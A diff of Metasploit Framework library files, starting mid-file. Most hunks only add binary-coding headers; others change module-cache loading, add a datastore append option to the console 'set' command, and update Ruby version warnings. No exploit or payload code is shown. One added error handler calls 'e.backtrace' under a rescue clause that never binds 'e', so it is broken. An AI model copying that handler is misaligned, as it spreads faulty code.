require 'msf/core/post/file'
require 'msf/core/post/unix'
diff --git a/lib/msf/core/post/osx/system.rb b/lib/msf/core/post/osx/system.rb
index 912b752939..5d96a8a5ec 100644
--- a/lib/msf/core/post/osx/system.rb
+++ b/lib/msf/core/post/osx/system.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
require 'msf/core/post/file'
diff --git a/lib/msf/core/post/solaris/priv.rb b/lib/msf/core/post/solaris/priv.rb
index 23d8711c56..80ceaee439 100644
--- a/lib/msf/core/post/solaris/priv.rb
+++ b/lib/msf/core/post/solaris/priv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
module Msf
diff --git a/lib/msf/core/post/solaris/system.rb b/lib/msf/core/post/solaris/system.rb
index c88c25a50b..7cae267453 100644
--- a/lib/msf/core/post/solaris/system.rb
+++ b/lib/msf/core/post/solaris/system.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/unix'
diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb
index 707e464c56..73d8fd69ca 100644
--- a/lib/msf/core/post/unix.rb
+++ b/lib/msf/core/post/unix.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
diff --git a/lib/msf/core/post/windows/accounts.rb b/lib/msf/core/post/windows/accounts.rb
index 672e656b7c..d035156721 100644
--- a/lib/msf/core/post/windows/accounts.rb
+++ b/lib/msf/core/post/windows/accounts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
module Windows
diff --git a/lib/msf/core/post/windows/cli_parse.rb b/lib/msf/core/post/windows/cli_parse.rb
index 9bcc4c424c..2a52356c5d 100644
--- a/lib/msf/core/post/windows/cli_parse.rb
+++ b/lib/msf/core/post/windows/cli_parse.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
diff --git a/lib/msf/core/post/windows/eventlog.rb b/lib/msf/core/post/windows/eventlog.rb
index 88d81d8690..c21fa270e3 100644
--- a/lib/msf/core/post/windows/eventlog.rb
+++ b/lib/msf/core/post/windows/eventlog.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
module Windows
diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb
index 81eac17dc6..2e08d549e9 100644
--- a/lib/msf/core/post/windows/powershell.rb
+++ b/lib/msf/core/post/windows/powershell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'zlib'
require 'msf/core/post/common'
diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 29e92918d5..3667d7058e 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/accounts'
diff --git a/lib/msf/core/post/windows/railgun.rb b/lib/msf/core/post/windows/railgun.rb
index ba97d832ae..72b12f179f 100644
--- a/lib/msf/core/post/windows/railgun.rb
+++ b/lib/msf/core/post/windows/railgun.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/railgun/railgun'
module Msf
diff --git a/lib/msf/core/post/windows/registry.rb b/lib/msf/core/post/windows/registry.rb
index 38ac73cfec..957c165ee0 100644
--- a/lib/msf/core/post/windows/registry.rb
+++ b/lib/msf/core/post/windows/registry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/cli_parse'
diff --git a/lib/msf/core/post/windows/registry.rb.ut.rb b/lib/msf/core/post/windows/registry.rb.ut.rb
index 55395ff084..21ceae8079 100644
--- a/lib/msf/core/post/windows/registry.rb.ut.rb
+++ b/lib/msf/core/post/windows/registry.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..','..','..','..','..', 'lib'))
diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb
index 363fb1f7b1..fc1339f9a9 100644
--- a/lib/msf/core/post/windows/services.rb
+++ b/lib/msf/core/post/windows/services.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/registry'
module Msf
diff --git a/lib/msf/core/post/windows/shadowcopy.rb b/lib/msf/core/post/windows/shadowcopy.rb
index 6dd4dcd5f6..0f7dbc389a 100644
--- a/lib/msf/core/post/windows/shadowcopy.rb
+++ b/lib/msf/core/post/windows/shadowcopy.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/services'
diff --git a/lib/msf/core/post/windows/user_profiles.rb b/lib/msf/core/post/windows/user_profiles.rb
index 0003fab29c..8f8a4817b8 100644
--- a/lib/msf/core/post/windows/user_profiles.rb
+++ b/lib/msf/core/post/windows/user_profiles.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/accounts'
diff --git a/lib/msf/core/post/windows/user_profiles.rb.ut.rb b/lib/msf/core/post/windows/user_profiles.rb.ut.rb
index c6d7c2a776..5ddb6ca2b6 100644
--- a/lib/msf/core/post/windows/user_profiles.rb.ut.rb
+++ b/lib/msf/core/post/windows/user_profiles.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..','..','..','..','..', 'lib'))
diff --git a/lib/msf/core/rpc.rb b/lib/msf/core/rpc.rb
index 8e352783f2..7558682bf2 100644
--- a/lib/msf/core/rpc.rb
+++ b/lib/msf/core/rpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "msf/core/rpc/service"
require "msf/core/rpc/client"
diff --git a/lib/msf/core/rpc/v10/client.rb b/lib/msf/core/rpc/v10/client.rb
index a3c60e32a8..144e3570df 100644
--- a/lib/msf/core/rpc/v10/client.rb
+++ b/lib/msf/core/rpc/v10/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'xmlrpc/client'
require 'msgpack'
diff --git a/lib/msf/core/rpc/v10/constants.rb b/lib/msf/core/rpc/v10/constants.rb
index 6aab513f07..5f4d2e4623 100644
--- a/lib/msf/core/rpc/v10/constants.rb
+++ b/lib/msf/core/rpc/v10/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
diff --git a/lib/msf/core/rpc/v10/rpc_auth.rb b/lib/msf/core/rpc/v10/rpc_auth.rb
index d9a76a8388..004692cbc1 100644
--- a/lib/msf/core/rpc/v10/rpc_auth.rb
+++ b/lib/msf/core/rpc/v10/rpc_auth.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Auth < RPC_Base
diff --git a/lib/msf/core/rpc/v10/rpc_base.rb b/lib/msf/core/rpc/v10/rpc_base.rb
index 2f90631195..ad3f8ec84a 100644
--- a/lib/msf/core/rpc/v10/rpc_base.rb
+++ b/lib/msf/core/rpc/v10/rpc_base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
diff --git a/lib/msf/core/rpc/v10/rpc_console.rb b/lib/msf/core/rpc/v10/rpc_console.rb
index 78d1f5a8ea..43e6246b70 100644
--- a/lib/msf/core/rpc/v10/rpc_console.rb
+++ b/lib/msf/core/rpc/v10/rpc_console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'pp'
require 'rex'
require 'msf/ui/web/driver'
diff --git a/lib/msf/core/rpc/v10/rpc_core.rb b/lib/msf/core/rpc/v10/rpc_core.rb
index e98783657d..2117fe4a1f 100644
--- a/lib/msf/core/rpc/v10/rpc_core.rb
+++ b/lib/msf/core/rpc/v10/rpc_core.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Core < RPC_Base
@@ -35,7 +36,7 @@ class RPC_Core < RPC_Base
end
def rpc_add_module_path(path)
- framework.modules.add_module_path(path, false)
+ framework.modules.add_module_path(path)
rpc_module_stats()
end
diff --git a/lib/msf/core/rpc/v10/rpc_db.rb b/lib/msf/core/rpc/v10/rpc_db.rb
index 0556ca9149..7701b5ae07 100644
--- a/lib/msf/core/rpc/v10/rpc_db.rb
+++ b/lib/msf/core/rpc/v10/rpc_db.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Db < RPC_Base
diff --git a/lib/msf/core/rpc/v10/rpc_job.rb b/lib/msf/core/rpc/v10/rpc_job.rb
index 7862a81596..7b0c74427f 100644
--- a/lib/msf/core/rpc/v10/rpc_job.rb
+++ b/lib/msf/core/rpc/v10/rpc_job.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Job < RPC_Base
diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb
index 876aab0534..0a112be7f7 100644
--- a/lib/msf/core/rpc/v10/rpc_module.rb
+++ b/lib/msf/core/rpc/v10/rpc_module.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: module.rb 12624 2011-05-15 23:51:53Z hdm $
##
diff --git a/lib/msf/core/rpc/v10/rpc_plugin.rb b/lib/msf/core/rpc/v10/rpc_plugin.rb
index e5493e2db2..723e67e58e 100644
--- a/lib/msf/core/rpc/v10/rpc_plugin.rb
+++ b/lib/msf/core/rpc/v10/rpc_plugin.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Plugin < RPC_Base
diff --git a/lib/msf/core/rpc/v10/rpc_session.rb b/lib/msf/core/rpc/v10/rpc_session.rb
index 8d108eeeea..25aa49fc82 100644
--- a/lib/msf/core/rpc/v10/rpc_session.rb
+++ b/lib/msf/core/rpc/v10/rpc_session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex'
require 'rex/ui/text/output/buffer'
diff --git a/lib/msf/core/rpc/v10/service.rb b/lib/msf/core/rpc/v10/service.rb
index b2c71e62ed..3ff567ec67 100644
--- a/lib/msf/core/rpc/v10/service.rb
+++ b/lib/msf/core/rpc/v10/service.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msgpack'
require 'rex'
diff --git a/lib/msf/core/session.rb b/lib/msf/core/session.rb
index de7bd44c04..4f3e025e73 100644
--- a/lib/msf/core/session.rb
+++ b/lib/msf/core/session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/session/basic.rb b/lib/msf/core/session/basic.rb
index 369a0f1007..f9ec9370d0 100644
--- a/lib/msf/core/session/basic.rb
+++ b/lib/msf/core/session/basic.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
diff --git a/lib/msf/core/session/comm.rb b/lib/msf/core/session/comm.rb
index b4942d363d..a0dffdca1a 100644
--- a/lib/msf/core/session/comm.rb
+++ b/lib/msf/core/session/comm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
module Msf
diff --git a/lib/msf/core/session/interactive.rb b/lib/msf/core/session/interactive.rb
index ac96fe2f28..92bc085f13 100644
--- a/lib/msf/core/session/interactive.rb
+++ b/lib/msf/core/session/interactive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
require 'rex/io/ring_buffer'
diff --git a/lib/msf/core/session/netware_console.rb b/lib/msf/core/session/netware_console.rb
index 8372a2a748..73bc189392 100644
--- a/lib/msf/core/session/netware_console.rb
+++ b/lib/msf/core/session/netware_console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
module Msf
diff --git a/lib/msf/core/session/provider/multi_command_execution.rb b/lib/msf/core/session/provider/multi_command_execution.rb
index 77823a5b89..566194b1c3 100644
--- a/lib/msf/core/session/provider/multi_command_execution.rb
+++ b/lib/msf/core/session/provider/multi_command_execution.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
module Provider
diff --git a/lib/msf/core/session/provider/multi_command_shell.rb b/lib/msf/core/session/provider/multi_command_shell.rb
index 1f8369dc67..f7423cdb6c 100644
--- a/lib/msf/core/session/provider/multi_command_shell.rb
+++ b/lib/msf/core/session/provider/multi_command_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
module Provider
diff --git a/lib/msf/core/session/provider/single_command_execution.rb b/lib/msf/core/session/provider/single_command_execution.rb
index 7da90f9f3c..23d700faa2 100644
--- a/lib/msf/core/session/provider/single_command_execution.rb
+++ b/lib/msf/core/session/provider/single_command_execution.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
module Provider
diff --git a/lib/msf/core/session/provider/single_command_shell.rb b/lib/msf/core/session/provider/single_command_shell.rb
index 5997b3de7b..bac23b5bed 100644
--- a/lib/msf/core/session/provider/single_command_shell.rb
+++ b/lib/msf/core/session/provider/single_command_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
module Provider
diff --git a/lib/msf/core/session_manager.rb b/lib/msf/core/session_manager.rb
index 4e3e753958..3b75ce8c37 100644
--- a/lib/msf/core/session_manager.rb
+++ b/lib/msf/core/session_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Msf
@@ -229,7 +230,7 @@ class SessionManager < Hash
framework.events.on_session_open(session)
rescue ::Exception => e
wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
- wlog("Call Stack\n#{e.backtrace.join("\n")}", 'core', LEV_3)
+ wlog("Call Stack\n#{e.backtrace.join("\n")}")
end
if session.respond_to?("console")
diff --git a/lib/msf/core/session_manager.rb.ut.rb b/lib/msf/core/session_manager.rb.ut.rb
index 1b604e2ffd..63d9cbfde6 100644
--- a/lib/msf/core/session_manager.rb.ut.rb
+++ b/lib/msf/core/session_manager.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/msf/core/task_manager.rb b/lib/msf/core/task_manager.rb
index 6c2db60e35..089cf2613c 100644
--- a/lib/msf/core/task_manager.rb
+++ b/lib/msf/core/task_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/thread_manager.rb b/lib/msf/core/thread_manager.rb
index 94bbad8bac..42ea49059a 100644
--- a/lib/msf/core/thread_manager.rb
+++ b/lib/msf/core/thread_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/plugin'
=begin
diff --git a/lib/msf/env/gemcache.rb b/lib/msf/env/gemcache.rb
index 1845d2e4c3..eedd7f7bfe 100644
--- a/lib/msf/env/gemcache.rb
+++ b/lib/msf/env/gemcache.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# This handles gem requirements for bundled installer environments
#
diff --git a/lib/msf/events.rb b/lib/msf/events.rb
index bb5314bed8..5238553786 100644
--- a/lib/msf/events.rb
+++ b/lib/msf/events.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module UiEventSubscriber
diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb
index 5fd91ccdb0..84d2bece5a 100644
--- a/lib/msf/sanity.rb
+++ b/lib/msf/sanity.rb
@@ -1,8 +1,8 @@
+# -*- coding: binary -*-
#
# Provides some sanity checks against the ruby build and version
#
-
# Check for the broken pack/unpack in OS X 10.4.x
if ([1].pack('n') == "\x01\x00")
$stderr.puts "*** This ruby build has a broken pack/unpack implementation! "
@@ -18,16 +18,21 @@ end
# Check for ruby 1.8.2 as the minimal supported version
if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/)
- $stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.2+"
+ $stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+"
exit(0)
end
# Check for ruby 1.9.0 and throw a big nasty warning
if (RUBY_VERSION =~ /^1\.9\.0/)
- $stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.1 or newer."
+ $stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer."
exit(0)
end
+# Check for ruby 1.9.1 and throw a warning
+if (RUBY_VERSION =~ /^1\.9\.1/)
+ $stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer."
+end
+
if(RUBY_VERSION =~ /^(1\.9|2\.0)\./)
# Load rubygems before changing default_internal, otherwise we may get
# Encoding::UndefinedConversionError as the gemspec files are loaded
diff --git a/lib/msf/scripts/meterpreter.rb b/lib/msf/scripts/meterpreter.rb
index 388fe363b7..87141b72e9 100644
--- a/lib/msf/scripts/meterpreter.rb
+++ b/lib/msf/scripts/meterpreter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/scripts/meterpreter/common'
require 'msf/scripts/meterpreter/registry'
require 'msf/scripts/meterpreter/file'
diff --git a/lib/msf/scripts/meterpreter/accounts.rb b/lib/msf/scripts/meterpreter/accounts.rb
index bf819e4090..78c559324a 100644
--- a/lib/msf/scripts/meterpreter/accounts.rb
+++ b/lib/msf/scripts/meterpreter/accounts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/accounts'
module Msf
diff --git a/lib/msf/scripts/meterpreter/common.rb b/lib/msf/scripts/meterpreter/common.rb
index 3f75ca8218..b2d5bd9464 100644
--- a/lib/msf/scripts/meterpreter/common.rb
+++ b/lib/msf/scripts/meterpreter/common.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
require 'msf/core/post/windows/eventlog'
require 'msf/core/post/windows/priv'
diff --git a/lib/msf/scripts/meterpreter/file.rb b/lib/msf/scripts/meterpreter/file.rb
index be58b460fb..06a83db993 100644
--- a/lib/msf/scripts/meterpreter/file.rb
+++ b/lib/msf/scripts/meterpreter/file.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/file'
module Msf
diff --git a/lib/msf/scripts/meterpreter/registry.rb b/lib/msf/scripts/meterpreter/registry.rb
index 8b095d1abe..0150a87f7d 100644
--- a/lib/msf/scripts/meterpreter/registry.rb
+++ b/lib/msf/scripts/meterpreter/registry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/registry'
module Msf
diff --git a/lib/msf/scripts/meterpreter/services.rb b/lib/msf/scripts/meterpreter/services.rb
index ea640a4f42..2585161af1 100644
--- a/lib/msf/scripts/meterpreter/services.rb
+++ b/lib/msf/scripts/meterpreter/services.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/services'
module Msf
diff --git a/lib/msf/ui.rb b/lib/msf/ui.rb
index 09e77933f0..de75c092ee 100644
--- a/lib/msf/ui.rb
+++ b/lib/msf/ui.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
end
diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb
index 933912a100..04d5ac2e07 100644
--- a/lib/msf/ui/banner.rb
+++ b/lib/msf/ui/banner.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
diff --git a/lib/msf/ui/common.rb b/lib/msf/ui/common.rb
index 65422eb96e..2f15755946 100644
--- a/lib/msf/ui/common.rb
+++ b/lib/msf/ui/common.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
@@ -19,7 +20,7 @@ class Common
# Add an additional module search path
when "modulepath"
# Don't affect the module cache by us loading these modules
- framework.modules.add_module_path(val, false)
+ framework.modules.add_module_path(val)
true
else
false
diff --git a/lib/msf/ui/console.rb b/lib/msf/ui/console.rb
index 972af0e376..d90d4d30e5 100644
--- a/lib/msf/ui/console.rb
+++ b/lib/msf/ui/console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb
index 9fb1741043..b3f29245a5 100644
--- a/lib/msf/ui/console/command_dispatcher.rb
+++ b/lib/msf/ui/console/command_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
diff --git a/lib/msf/ui/console/command_dispatcher/auxiliary.rb b/lib/msf/ui/console/command_dispatcher/auxiliary.rb
index 015ca29e82..096e0643ec 100644
--- a/lib/msf/ui/console/command_dispatcher/auxiliary.rb
+++ b/lib/msf/ui/console/command_dispatcher/auxiliary.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
@@ -110,6 +111,11 @@ class Auxiliary
)
rescue ::Timeout::Error
print_error("Auxiliary triggered a timeout exception")
+ print_error("Call stack:")
+ e.backtrace.each do |line|
+ break if line =~ /lib.msf.base.simple/
+ print_error(" #{line}")
+ end
rescue ::Interrupt
print_error("Auxiliary interrupted by the console user")
rescue ::Exception => e
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 40c160693d..3acc2b3b32 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/ui/console/command_dispatcher/encoder'
require 'msf/ui/console/command_dispatcher/exploit'
require 'msf/ui/console/command_dispatcher/nop'
@@ -1232,7 +1233,7 @@ class Core
curr_path = path
# Load modules, but do not consult the cache
- if (counts = framework.modules.add_module_path(path, false))
+ if (counts = framework.modules.add_module_path(path))
counts.each_pair { |type, count|
totals[type] = (totals[type]) ? (totals[type] + count) : count
@@ -1703,6 +1704,14 @@ class Core
global = true
end
+ # Decide if this is an append operation
+ append = false
+
+ if (args[0] == '-a')
+ args.shift
+ append = true
+ end
+
# Determine which data store we're operating on
if (active_module and global == false)
datastore = active_module.datastore
@@ -1760,9 +1769,13 @@ class Core
return true
end
- datastore[name] = value
+ if append
+ datastore[name] = datastore[name] + value
+ else
+ datastore[name] = value
+ end
- print_line("#{name} => #{value}")
+ print_line("#{name} => #{datastore[name]}")
end
#
@@ -2278,7 +2291,7 @@ class Core
# Returns the revision of the framework and console library
#
def cmd_version(*args)
- svn_console_version = "$Revision: 14065 $"
+ svn_console_version = "$Revision: 15168 $"
svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil
if svn_metasploit_version
print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}")
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index e687c02b16..6feb9a6249 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
require 'rex/parser/nmap_xml'
diff --git a/lib/msf/ui/console/command_dispatcher/encoder.rb b/lib/msf/ui/console/command_dispatcher/encoder.rb
index 7bf4e68090..b71e3216d5 100644
--- a/lib/msf/ui/console/command_dispatcher/encoder.rb
+++ b/lib/msf/ui/console/command_dispatcher/encoder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb
index 69eb859507..9398558764 100644
--- a/lib/msf/ui/console/command_dispatcher/exploit.rb
+++ b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/command_dispatcher/nop.rb b/lib/msf/ui/console/command_dispatcher/nop.rb
index 9f5d66e113..de306027de 100644
--- a/lib/msf/ui/console/command_dispatcher/nop.rb
+++ b/lib/msf/ui/console/command_dispatcher/nop.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/parser/arguments'
module Msf
diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb
index dd1430db7e..c3449fc484 100644
--- a/lib/msf/ui/console/command_dispatcher/payload.rb
+++ b/lib/msf/ui/console/command_dispatcher/payload.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/ui/console/command_dispatcher/post.rb b/lib/msf/ui/console/command_dispatcher/post.rb
index b2f66977a3..d61864e924 100644
--- a/lib/msf/ui/console/command_dispatcher/post.rb
+++ b/lib/msf/ui/console/command_dispatcher/post.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index c82ed28bcb..399c0781c2 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/base'
require 'msf/ui'
@@ -139,7 +140,6 @@ class Driver < Msf::Ui::Driver
print_error("***")
end
-
begin
require 'openssl'
rescue ::LoadError
@@ -155,12 +155,6 @@ class Driver < Msf::Ui::Driver
# Re-enable output
self.disable_output = false
- # Load additional modules as necessary
- self.framework.modules.add_module_path(opts['ModulePath'], false) if opts['ModulePath']
-
- # Load console-specific configuration
- load_config(opts['Config'])
-
# Whether or not command passthru should be allowed
self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true
@@ -215,11 +209,33 @@ class Driver < Msf::Ui::Driver
end
print_error("Failed to connect to the database: #{framework.db.error} #{db.inspect} #{framework.db.error.backtrace}")
+ else
+ self.framework.modules.refresh_cache
+ if self.framework.modules.cache.keys.length == 0
+ print_status("The initial module cache will be built in the background, this can take 2-5 minutes...")
+ end
end
end
end
end
+ # Initialize the module paths only if we didn't get passed a Framework instance
+ unless opts['Framework']
+ # Configure the framework module paths
+ self.framework.init_module_paths
+ self.framework.modules.add_module_path(opts['ModulePath']) if opts['ModulePath']
+
+ # Rebuild the module cache in a background thread
+ self.framework.threads.spawn("ModuleCacheRebuild", true) do
+ self.framework.cache_thread = Thread.current
+ self.framework.modules.rebuild_cache
+ self.framework.cache_initialized = true
+ self.framework.cache_thread = nil
+ end
+ end
+
+ # Load console-specific configuration (after module paths are added)
+ load_config(opts['Config'])
# Process things before we actually display the prompt and get rocking
on_startup(opts)
diff --git a/lib/msf/ui/console/framework_event_manager.rb b/lib/msf/ui/console/framework_event_manager.rb
index 40d0e8f618..9adb2e6944 100644
--- a/lib/msf/ui/console/framework_event_manager.rb
+++ b/lib/msf/ui/console/framework_event_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb
index 95250e823d..8337bbb0b9 100644
--- a/lib/msf/ui/console/module_command_dispatcher.rb
+++ b/lib/msf/ui/console/module_command_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/ui/console/command_dispatcher'
module Msf
diff --git a/lib/msf/ui/console/table.rb b/lib/msf/ui/console/table.rb
index f95be6a433..92f9673cb0 100644
--- a/lib/msf/ui/console/table.rb
+++ b/lib/msf/ui/console/table.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
diff --git a/lib/msf/ui/driver.rb b/lib/msf/ui/driver.rb
index 293c226cac..02f3daea8d 100644
--- a/lib/msf/ui/driver.rb
+++ b/lib/msf/ui/driver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
diff --git a/lib/msf/ui/web.rb b/lib/msf/ui/web.rb
index d9e294aeba..4b33298f2b 100644
--- a/lib/msf/ui/web.rb
+++ b/lib/msf/ui/web.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Web
diff --git a/lib/msf/ui/web/comm.rb b/lib/msf/ui/web/comm.rb
index 91bc2dfe0d..2e3d2d2c96 100644
--- a/lib/msf/ui/web/comm.rb
+++ b/lib/msf/ui/web/comm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Web
diff --git a/lib/msf/ui/web/console.rb b/lib/msf/ui/web/console.rb
index 0cfc78aecc..17dadcdecd 100644
--- a/lib/msf/ui/web/console.rb
+++ b/lib/msf/ui/web/console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Web
@@ -46,6 +47,11 @@ class WebConsole
# Create a read subscriber
self.pipe.create_subscriber('msfweb')
+ # Skip database initialization if it is already configured
+ if framework.db and framework.db.usable and framework.db.migrated
+ opts['SkipDatabaseInit'] = true
+ end
+
# Initialize the console with our pipe
self.console = Msf::Ui::Console::Driver.new(
'msf',
diff --git a/lib/msf/ui/web/driver.rb b/lib/msf/ui/web/driver.rb
index e5514394a5..9d7790d3b2 100644
--- a/lib/msf/ui/web/driver.rb
+++ b/lib/msf/ui/web/driver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
require 'msf/core'
require 'msf/base'
diff --git a/lib/msf/util.rb b/lib/msf/util.rb
index 9a13a906c9..6ce2bdd01e 100644
--- a/lib/msf/util.rb
+++ b/lib/msf/util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# framework-util
